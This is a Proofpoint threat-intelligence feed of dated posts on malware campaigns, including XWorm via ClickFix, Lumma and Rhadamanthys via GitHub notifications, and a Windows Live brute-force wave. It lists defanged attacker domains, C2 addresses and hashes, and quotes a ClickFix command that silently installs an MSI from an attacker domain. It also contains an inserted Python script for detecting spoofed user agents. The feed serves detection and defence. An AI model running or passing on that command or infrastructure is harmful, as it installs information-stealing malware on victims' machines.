Threat Insight

Proofpoint's insights on targeted attacks & the security landscape.

2025-11-13

Proofpoint is proud to have assisted law enforcement in the #OperationEndgame investigation that led to the November 13, 2025 disruption of #Rhadamanthys and #VenomRAT, both #malware used by multiple cybercriminals.

• Rhadamanthys: brnw.ch/21wXs1N
• VenomRAT: brnw.ch/21wXs1O

---

Since May 2024, Operation Endgame—a global law enforcement and private sector effort that includes Proofpoint—has significantly disrupted the #malware and #botnet ecosystem.

👉 #Europol called the May 2024 Operation Endgame actions “the largest ever operation against botnets.”

👉 In May 2025, additional malware families and their creators, including #DanaBot, were taken down.

---

Each disruption forces threat actors to adapt and invest time and resources to retool their attack chains.

With our unique visibility and leading detection capabilities, Proofpoint researchers will continue monitoring the threat landscape and provide insight into the biggest cyber threats to society.

Distribution of VenomRAT by threat actor.
Timeline of Rhadamanthys campaigns.
2025-11-03

From Old West train robbers 🚂 to 1960s mobsters 💰, #cargotheft is an age-old problem—now it’s gone digital. 💻

In a revealing blog, our threat researchers detail the #digitaltransformation of cargo theft, and how criminals are combining #socialengineering with their #trucking and #transportation industry knowledge to steal real, physical goods. 📦

🔗 proofpoint.com/us/blog/threat-

---

Cargo theft leads to $34 billion in losses annually in the U.S. It massively impacts #supplychains, exploiting the #logistics technology that underpins today’s commerce. 💸

We’re tracking cybercriminals enabling this activity. Here’s how it works:

Hackers compromise trucking and transport companies, then post fake "loads" for truckers and brokers to claim.
⬇️
Once a trucker replies, the attackers infect them with malicious RMM tools to take over their company. They then try to bid on real loads so they can intercept and pick them up.
⬇️
The stolen loads (cargo, physical goods) are then sold overseas or elsewhere.

2025-10-23

Proofpoint threat researchers have designed an open-source tool—named PDF Object Hashing—to track and detect the unique characteristics of PDFs used by threat actors... similar to a digital fingerprint. 🫆

We use this tool internally to help track multiple threat actors with high confidence, improving attribution in many cases.

The tool has been released in the Proofpoint Emerging Threats public #GitHub for other defenders to leverage.

Learn more about it here: proofpoint.com/us/blog/threat-

#PDF #threatdetection #cyberthreat

Example PDF lures used by threat actors impersonating various brands.
2025-10-21

With the goal of better understanding cloud account takeover (ATO) attacks, our threat researchers developed a tool that automates the creation of malicious internal applications within a compromised cloud environment.

This blog post provides an in-depth technical analysis of that tool and its implications for enterprise security.

🔗 proofpoint.com/us/blog/threat-

#cloud #ATO #credentials #OAuth #cyberrisk #accounttakeover

2025-10-20

Since 14 October, we’ve tracked a high-volume XWorm campaign targeting Germany. The activity is attributed to TA584, a sophisticated #cybercrime group tracked since 2020.

Messages are sent from hundreds of compromised sender accounts impersonating ELSTER and contain malicious URLs.

These URLs are either attacker-controlled URLs hosted on compromised websites, AWS-hosted URLs that redirect to those same sites, or unique Trend Micro click-time protection URLs that redirect to the AWS URLs. Proofpoint has notified Trend Micro about the potential abuse.

The compromised websites redirect the user to the attacker-controlled domain, which performs IP filtering. If the check passes, the visitor is redirected to the landing page (LP), which contains a matching themed page with a "Slide" CAPTCHA. If the CAPTCHA is solved, a ClickFix page guides the user to follow instructions.

If the ClickFix instructions are followed, a remote PowerShell script is executed that disables AMSI, loads a memory‑only .NET loader (included in the script) which injects an XWorm payload into RegSvcs.exe, clears the clipboard, and exits.

The user is redirected to a legitimate website if the ClickFix command is successful. This is done via a server-side check (most likely IP-based) in response to a POST to https[:]//[InvolvedHostName][.]top/api/exe.

Proofpoint tracks this variant of XWorm as “P0WER” because it uses this string as its AES key. This variant always uses SharpHide for persistence, setting up a hidden registry key that executes another remote PowerShell script on each boot to run XWorm again.

Proofpoint assesses TA584 is an initial access provider whose compromises can lead to #ransomware.

Historically, this actor focused on North America and the UK. TA584 expanded its targeting to include European entities including Germany since 1 July 2025.

---

Landing page: hxxps://www[.]eportal-npa[.]elster-de[.]quick-print[.]top/ePortal/ or hxxps://www[.]npa-eportal[.]digital-service[.]elster-de[.]status-drive[.]top/ePortal/

Click Payload: hxxp://94[.]159[.]113[.]37/ssd.png | b6956f45bd3c7b3009a31f0caf087d0686e60ee96978766a9f6477b8b093eace

XWorm C2: 85[.]208[.]84[.]208:4411

SharpHide Payload: 85[.]208[.]84[.]208/x.jpg

2025-10-13

Meet TA585: A sophisticated cybercriminal actor named by Proofpoint that stands out for its innovation in the evolving threat landscape.

In this blog, our researchers detail the identification, behaviors and activity of TA585. Notably, it owns its operation of the entire attack chain, from infrastructure and email delivery to malware installation.

⚠️ Learn all the details about this advanced threat here: proofpoint.com/us/blog/threat-

#TA585 #MonsterV2 #malware #cyberthreat #cybercrime #ClickFix #PowerShell #GitHub

IRS Themed ClickFix Landing leading to MonsterV2, observed on 26 February 2025.
2025-10-10

Researchers at Proofpoint have uncovered a recent brute force campaign, tracked as UNK_CustomCloak, targeting the first-party app, Windows Live Custom Domains.

Activity was observed from September 20th-30th, affecting nearly half a million users in over 4,000 tenants.

Windows Live Custom Domains (92bcc0b3-6fb6-40a5-9577-53629580dc3e) is a legacy service that allows domain owners to use Outlook with their own domains.

No malicious activity was observed in the application in the following months, indicating a shift in attacker tactics.

The threat actor is seen rotating through over half a million IPs, predominantly IPv6. The method for spoofing user agents results in non-existent browser versions with a matching Chrome & Edge number, which can be used to uniquely characterize the campaign.

---

Example UAs:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/1000005345.0.0.0 Safari/537.36 Edg/1000005345.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/10408.0.0.0 Safari/537.36 Edg/10408.0.0.0
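The two traits the post describes (a browser major version that cannot exist, and an Edg/ token that simply copies the Chrome/ token) can be turned into a sign-in log check. This is an added example written for this page, not Proofpoint tooling; the plausibility cap and the tab-separated log format are assumptions.

```python
import re

# Assumption: real Chromium-based builds had major versions in the low 100s when this
# campaign ran, so anything far above that cannot be a genuine browser. Tune as needed.
MAX_PLAUSIBLE_CHROME_MAJOR = 300

# Matches the "Chrome/<ver> Safari/537.36 Edg/<ver>" tail shared by spoofed and genuine Edge UAs.
_EDGE_UA_RE = re.compile(
    r"Chrome/(?P<chrome>\d+(?:\.\d+){3}) Safari/537\.36 Edg/(?P<edge>\d+(?:\.\d+){3})"
)


def analyze_edge_ua(ua: str) -> dict:
    """Return a verdict for one User-Agent string.

    Genuine Edge keeps the reduced Chrome/<major>.0.0.0 token but reports its own full
    build number after Edg/; the campaign's UAs repeat the Chrome token verbatim.
    """
    match = _EDGE_UA_RE.search(ua)
    if not match:
        return {"edge_like": False, "suspicious": False, "reasons": []}

    chrome, edge = match["chrome"], match["edge"]
    chrome_major = int(chrome.split(".")[0])
    reasons = []
    if chrome_major > MAX_PLAUSIBLE_CHROME_MAJOR:
        reasons.append("implausible_chrome_major")
    if chrome == edge and edge.endswith(".0.0.0"):
        reasons.append("edge_version_copied_from_chrome")
    return {"edge_like": True, "suspicious": bool(reasons), "reasons": reasons}


def count_suspicious_per_day(log_lines):
    """Count flagged sign-ins per day over lines in the constructed 'YYYY-MM-DD<TAB>UA' format."""
    counts = {}
    for line in log_lines:
        day, _, ua = line.partition("\t")
        if analyze_edge_ua(ua)["suspicious"]:
            counts[day] = counts.get(day, 0) + 1
    return counts


# Constructed sample log: the two UAs quoted in the post plus one genuine-looking Edge UA.
SAMPLE_LOG = [
    "2025-09-21\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/1000005345.0.0.0 Safari/537.36 Edg/1000005345.0.0.0",
    "2025-09-21\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/10408.0.0.0 Safari/537.36 Edg/10408.0.0.0",
    "2025-09-22\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.70",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(analyze_edge_ua(line.split("\t", 1)[1]))
    print(count_suspicious_per_day(SAMPLE_LOG))
```

Both reasons fire on the quoted UAs, so either check alone is enough to characterize the campaign; the per-day count mirrors the event chart the post shows.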

Count of events per day targeting Windows Live Custom Domains
2025-09-18

Proofpoint threat researchers published new research identifying a new cyber-espionage campaign by #TA415 (#APT41), a China-aligned threat actor, exploiting growing uncertainty in U.S.-China economic relations.

🔗 Full blog: proofpoint.com/us/blog/threat-

The group is impersonating trusted organizations and policymakers to target U.S. government, academic, and think tank targets.

See our blog for a detailed breakdown of these July and August 2025 campaigns, infection chain, IOCs, and Emerging Threats rulesets.

TA415 phishing email spoofing US-China Business Council.
2025-09-03

Threat actors continue to abuse GitHub to deliver malware, this time: #LummaStealer. We identified GitHub notification emails that kick off the attack chain. Messages are sent when the threat actor, using an actor-controlled account, comments on existing GitHub issues.

The comment includes either a link to the actor-controlled domain droplink[.]digital, a Dropbox URL, or a file attached directly to the issue (which creates a link to the file hosted on GitHub). The comments claim to provide a fix for the reported problem. People who get these emails may include: the issue creator, the repository owner, the issue assignee, or any watchers.

The downloaded file is always named “fix.zip”, which contains “x86_64-w64-ranlib.exe” and “msvcp140.dll”. If the executable is run, it launches #Lumma via “msbuild.exe”.

The hash of the executable (and therefore the ZIP file) may vary depending on when the Lumma payload was built. Example:

File name: fix.zip

Retrieved From: hxxps://objects[.]githubusercontent[.]com/github-production-repository-file-5c1aeb/195216627/22101425?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20250903%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250903T111859Z&X-Amz-Expires=300&X-Amz-Signature=f0cd8226472614321e6b9e3b883bffe0adf9d9255af1207374947ea71d3c8f76&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dfix.zip&response-content-type=application%2Fx-zip-compressed

MD5: 4d8730a2f3388d018b7793f03fb79464

SHA1: cbc5b2181854a2672013422e02df9ea35c3c9e1c

SHA256: c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839

Although GitHub has removed some of the malicious comments, the links in the messages remained active as of September 3, including the actor-controlled URLs.

On September 2-3 some of the files attached to the issues had random file names and were encrypted. While they contained an executable with the same name, the threat actor did not provide the password for these files, so they could not be extracted and did not lead to any malware installation.

2025-08-29

Threat actors are exploiting #Microsoft365 Direct Send to make their phishing campaigns appear to originate from inside an organization.

On this episode of DISCARDED, Selena Larson and Jason Ford explain why legacy features like Direct Send are a prime target for cybercriminals, and share actionable advice for defenders.

Stream now on your favorite #podcast platform:

Apple Podcasts: brnw.ch/21wVja2
Spotify: brnw.ch/21wVja4
Web player: brnw.ch/21wVja5

2025-08-21

Something #spicy is coming to the next Only Malware in the Building podcast—dropping September 2. 🌶️

Bookmark the show page and reserve your seat at the table 🪑 alongside @selenalarson, Dave Bittner and Keith Mularski.

🔥 You won't want to miss it! thecyberwire.com/podcasts/only

#podcast #hotones

2025-08-20

You asked, we answered. AI tools are significantly lowering the barrier to entry for cybercriminals.

Proofpoint recently observed threat actor campaigns leveraging the AI-generated website builder #Lovable to create and host credential #phishing, #malware, and #fraud websites.

Tens of thousands of Lovable URLs have been flagged by our team in email and SMS data since February 2025.

See our blog to see all the campaign details and learn how automatic, AI-powered, web creation tools are affecting the threat landscape. brnw.ch/21wV3DD

#LovableAI #webapp #webbuilder #impersonation

Example CAPTCHA that redirects to banking credential phishing website.
2025-08-18

Proofpoint identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys.

We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. infosec.exchange/@anyrun_app/1

We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts, who receive notifications that they have been tagged, along with the text from the issue.

The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to verify they are human.

Following the instructions will initiate a command that downloads and executes malware.

The specific malware may vary throughout the campaign.

At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.

Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject.

CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.

CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.

Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn

Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2

Example system commands:

C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe

Bitly redirect: hxxps://gitsecguards[.]com

ClickFix Landing domain: security[.]flaxergaurds[.]com

Organizations are encouraged to restrict PowerShell to only approved administrative users.

2025-08-12

Proofpoint threat researchers have uncovered a way to sidestep FIDO-based authentication, a protection method used to block credential phishing and account takeover (ATO).

Blog: proofpoint.com/us/blog/threat-

While the tactic has not yet been observed in the wild, the discovery is a significant emerging threat and exposes targets to adversary-in-the-middle (AiTM) threats.

Read our blog to understand how this potential threat questions the reliability of FIDO (Fast Identity Online) passkey implementations, an authentication method currently viewed as robust for verifying user identities and recommended for improving online security.

#FIDO #authentication #ATO #MFA

2025-07-31

In a new technical blog, Proofpoint threat researchers detailed their observations of threat actors impersonating well-known enterprises with fake #Microsoft #OAuth applications that redirect to malicious URLs, enabling credential phishing.

See our blog for full campaign details and impersonation examples. We also included tips on how to defend against hybrid (email and cloud) threats. proofpoint.com/us/blog/threat-

Landing page for requested permissions from malicious OAuth app.
2025-07-29

Every threat actor group has its own unique tactics, techniques, and procedures (TTPs). For example, during #taxseason, #TA558 pivots from its typical reservation-themed email lures to target financial firms with tax-related lures.

#TA2541 is known to consistently target organizations in the aerospace, manufacturing, and defense industries using remote access trojans (RATs).

#TA582's TTPs feel like a digital jigsaw puzzle, with simultaneous email, web inject, and compromised site vectors.

Stream this DISCARDED podcast episode to hear all about the chaotic brilliance of mid-tier eCrime actors. proofpoint.com/us/podcasts/dis

2025-07-24

🚨 Job Seekers, watch out! 🚨 Proofpoint researchers have observed multiple email campaigns impersonating job interview invites from real companies and recruiters.

These emails claim to offer opportunities via Zoom or Teams, but instead lead recipients to install remote management tools (RMM) like SimpleHelp, ScreenConnect, or Atera.

Here's what you need to know:

💻 What’s the threat?
While RMM tools are used legitimately by IT teams, in the hands of cybercriminals, they function like remote access trojans (RATs)—granting attackers full access to your computer, data, and finances.

📬 In one case, a hacked LinkedIn account posted a real job description but swapped in a malicious Gmail address. Proofpoint later discovered this address being used to send fake interview invites to job seekers who had applied.

🔍 How are they doing it?

Threat actors may:

• Create fake job listings to harvest emails
• Hack recruiter inboxes or LinkedIn accounts
• Use lists of stolen email addresses

🎯 This trend is part of a broader wave of cyberattacks where RMM/RAS (remote access software) is used as the initial payload—blending in with normal traffic before launching further attacks like data theft or ransomware.

⚠️ If you're job hunting, stay alert:

• Double-check email sender names and domains
• Be wary of .exe files or suspicious URLs
• If something feels off, trust your instinct

Read more from our threat research team on threats using RMM tools: proofpoint.com/us/blog/threat-

#OpenToWork #JobSearch #JobScam #RMM

2025-07-22

Proofpoint threat researchers released new details on a widespread Request for Quote (RFQ) scam that involves leveraging common Net financing options to steal a variety of high value electronics and goods.

To understand how the scam works, our researchers posed as suppliers with lax finance departments and engaged directly with threat actors.

Step into the mind of a cybercriminal and read all about the anatomy of the scam in this blog: proofpoint.com/us/blog/threat-

#shipment #RFQ #finance #scam

2025-07-16

New Proofpoint threat research revealed an increase in China-aligned cyber #espionage targeting Taiwan’s #semiconductor industry—a sector critical to the global tech #supplychain.

At least 3️⃣ distinct China-aligned threat actors are behind the efforts.

These campaigns likely reflect China’s strategic push for semiconductor self-sufficiency amid tightening US and Taiwanese #export controls.

See this new blog for a breakdown of the tactics, tools, and implications: proofpoint.com/us/blog/threat-

2025-06-30

Espionage 🤝 Cybercrime :: TA829 🤝 UNK_GreenSec

Our extensive visibility into the threat landscape has led us to conclude that there is very likely a link between TA829 (a cybercriminal actor also conducting #espionage in line with Russian state interests) & UNK_GreenSec (a #cybercriminal cluster observed deploying #malware and #ransomware).

See our research blog for a technical analysis of the intriguing overlap between the threat actor clusters. brnw.ch/21wTN3n
